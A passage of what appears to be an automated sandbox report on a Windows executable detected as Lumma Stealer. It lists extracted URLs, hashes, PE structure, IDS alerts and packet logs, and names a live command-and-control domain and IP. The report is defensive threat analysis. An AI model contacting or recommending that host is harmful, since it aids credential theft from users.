https://begguinnerz.biz:443/apin.txtPK	NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/piT	NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://begguinnerz.biz/	NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz:443/apiOO	NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microX	NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000195F000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/$	NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/apiz/	NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/L	NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/pil	NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/D	NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://begguinnerz.biz:443/api	NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.190.223	begguinnerz.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581123
Start date and time:	2024-12-27 03:00:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NewI Upd v1.1.0.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 83% Number of executed functions: 41 Number of non-executed functions: 158
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:03:10	API Interceptor	8x Sleep call for process: NewI Upd v1.1.0.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	setup.exe	Get hash	malicious	LummaC	Browse	172.67.197.192
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.218.163
	http://kxyaiaqyijjz.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://pdf-ezy.com/pdf-ez.exe	Get hash	malicious	Unknown	Browse	172.67.152.3
	b8ygJBG5cb.msi	Get hash	malicious	Unknown	Browse	172.67.194.29
	tBnELFfQoe.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.49.159
	phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.eml	Get hash	malicious	Unknown	Browse	104.17.25.14
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	172.67.214.186
	https://contractnerds.com/	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	setup.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	exlauncher-unpadded.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	atw3.dll	Get hash	malicious	Gozi, Ursnif	Browse	172.67.190.223
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	172.67.190.223
	0zBsv1tnt4.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	cqHMm0ykDG.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	172.67.190.223
	9idglWFv95.exe	Get hash	malicious	LummaC	Browse	172.67.190.223

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.116294587223981
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NewI Upd v1.1.0.exe
File size:	2'757'632 bytes
MD5:	f186a87680772f195f865cedab080b6d
SHA1:	3eae87351603339cb281f0f89722e5b5238d476d
SHA256:	fc07dfae95323c988627ac7e858d37dd165e34b25d5c2a00705caf8fea594e01
SHA512:	b3d4b54fb822cfe19da385e6f6b416d864f909dcf8b4c3f5c30e0d739da39cead15cb73dbad4ad453a7820f9497f09a1f2aa6e37a79d3e21a5215e945633e4f1
SSDEEP:	49152:onVl/s1RAH1X6YX8r27yEhYZQegaycHlr+HHkKTfS4UkvTdssev116yZzna1Wy33:qm1RAJ6YX8r27yEhYZQwpHlr+HHkKTfS
TLSH:	0BD5AE3C2660D81ADF6B86F0DA67269D8C5D28738B8FF9CB138931F948239EC4571197
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..

File Icon


Icon Hash:	b1b0b0b08888b0a2

Static PE Info

General

Entrypoint:	0x64d010
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x676BEF47 [Wed Dec 25 11:40:55 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	4159edb38142459c0d592c68fcfb12bb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
call 00007F22B91D770Dh
pop ebp
ret
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0067F018h]
mov eax, dword ptr [ebp+08h]
push eax
call dword ptr [0067F014h]
push C0000409h
call dword ptr [0067F01Ch]
push eax
call dword ptr [0067F020h]
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0067F024h]
test eax, eax
je 00007F22B91D7A09h
mov ecx, 00000002h
int 29h
mov dword ptr [00690EA0h], eax
mov dword ptr [00690E9Ch], ecx
mov dword ptr [00690E98h], edx
mov dword ptr [00690E94h], ebx
mov dword ptr [00690E90h], esi
mov dword ptr [00690E8Ch], edi
mov word ptr [00690EB8h], ss
mov word ptr [00690EACh], cs
mov word ptr [00690E88h], ds
mov word ptr [00690E84h], es
mov word ptr [00690E80h], fs
mov word ptr [00690E7Ch], gs
pushfd
pop dword ptr [00690EB0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00690EA4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00690EA8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00690EB4h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x28db5c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x293000	0x77e9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x29b000	0xb004	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x28cb1c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x28cb70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x27f000	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x27d10a	0x27d200	d66623399ce61ad5327a4cd7f599641c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x27f000	0xf254	0xf400	bc7088c947c817b8285f4a700fbc7be6	False	0.32444287909836067	data	4.581976872219791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x28f000	0x2ee8	0x1e00	bc0e63525bb52951ab4493ef3b33a89f	False	0.5591145833333333	data	6.1623762929451535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fptable	0x292000	0x80	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x293000	0x77e9	0x7800	97cb107d31eedbbe8ca8ac8974da4fba	False	0.52529296875	data	4.805907824282731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x29b000	0xb004	0xb200	576f624b5b43b9cba6fd0c26c6f5aee8	False	0.7525456460674157	data	6.82489368421326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x293688	0x183e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced			0.8991298743151789
RT_MENU	0x294ec8	0x58c	data			0.5309859154929577
RT_MENU	0x295454	0x4e0	data			0.5256410256410257
RT_DIALOG	0x295934	0x230	data			0.5892857142857143
RT_DIALOG	0x295b64	0x4d8	data			0.49112903225806454
RT_DIALOG	0x29603c	0x3d0	data			0.5133196721311475
RT_DIALOG	0x29640c	0x548	data			0.4807692307692308
RT_DIALOG	0x296954	0x32c	data			0.562807881773399
RT_DIALOG	0x296c80	0x520	data			0.5083841463414634
RT_DIALOG	0x2971a0	0x378	data			0.5472972972972973
RT_DIALOG	0x297518	0x248	data			0.6078767123287672
RT_DIALOG	0x297760	0x30c	data			0.5384615384615384
RT_DIALOG	0x297a6c	0x2fc	data			0.5327225130890052
RT_DIALOG	0x297d68	0x434	data			0.5092936802973977
RT_DIALOG	0x29819c	0x554	data			0.5029325513196481
RT_DIALOG	0x2986f0	0x3cc	data			0.507201646090535
RT_DIALOG	0x298abc	0x6d0	data			0.46559633027522934
RT_DIALOG	0x29918c	0x368	data			0.5389908256880734
RT_STRING	0x2994f4	0x178	data			0.601063829787234
RT_STRING	0x29966c	0x18c	data			0.6035353535353535
RT_STRING	0x2997f8	0x190	data			0.5975
RT_STRING	0x299988	0x1a0	data			0.6129807692307693
RT_STRING	0x299b28	0x180	data			0.59375
RT_STRING	0x299ca8	0x174	data			0.6155913978494624
RT_STRING	0x299e1c	0x180	data			0.609375
RT_STRING	0x299f9c	0x19c	data			0.6092233009708737
RT_STRING	0x29a138	0x184	data			0.6185567010309279
RT_STRING	0x29a2bc	0x8c	data			0.6857142857142857
RT_GROUP_ICON	0x29a348	0x14	data			1.05
RT_VERSION	0x29a35c	0x310	data			0.5063775510204082
RT_MANIFEST	0x29a66c	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle

USER32.dll

MessageBoxA, MessageBoxW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-27T03:03:10.424698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49883	172.67.190.223	443	TCP
2024-12-27T03:03:11.195565+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49883	172.67.190.223	443	TCP
2024-12-27T03:03:11.195565+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49883	172.67.190.223	443	TCP
2024-12-27T03:03:12.520456+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49889	172.67.190.223	443	TCP
2024-12-27T03:03:13.311805+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49889	172.67.190.223	443	TCP
2024-12-27T03:03:13.311805+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49889	172.67.190.223	443	TCP
2024-12-27T03:03:15.056791+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49895	172.67.190.223	443	TCP
2024-12-27T03:03:16.071033+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49895	172.67.190.223	443	TCP
2024-12-27T03:03:17.385054+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49902	172.67.190.223	443	TCP
2024-12-27T03:03:19.610771+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49907	172.67.190.223	443	TCP
2024-12-27T03:03:22.349274+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49914	172.67.190.223	443	TCP
2024-12-27T03:03:24.433081+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49920	172.67.190.223	443	TCP
2024-12-27T03:03:27.179953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49926	172.67.190.223	443	TCP
2024-12-27T03:03:27.935946+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49926	172.67.190.223	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 03:03:09.102252960 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:09.102318048 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:09.102402925 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:09.105305910 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:09.105320930 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:10.424614906 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:10.424698114 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:10.426286936 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:10.426295996 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:10.426536083 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:10.469324112 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:10.479543924 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:10.479559898 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:10.479655981 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:11.195583105 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:11.195744038 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:11.196011066 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:11.197743893 CET	49883	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:11.197756052 CET	443	49883	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:11.213727951 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:11.213748932 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:11.213819027 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:11.214096069 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:11.214106083 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:12.520191908 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:12.520456076 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:12.521989107 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:12.521997929 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:12.522203922 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:12.523471117 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:12.523494005 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:12.523535013 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.311811924 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.311889887 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.311923981 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.311947107 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.311975002 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.312035084 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.312041998 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.320133924 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.320194960 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.320200920 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.331402063 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.331556082 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.331566095 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.375619888 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.375647068 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.422460079 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.432549953 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.485008001 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.485027075 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.521940947 CET	443	49889	172.67.190.223	192.168.2.4
Dec 27, 2024 03:03:13.522015095 CET	49889	443	192.168.2.4	172.67.190.223
Dec 27, 2024 03:03:13.522026062 CET	443	49889	172.67.190.223	192.168.2.4
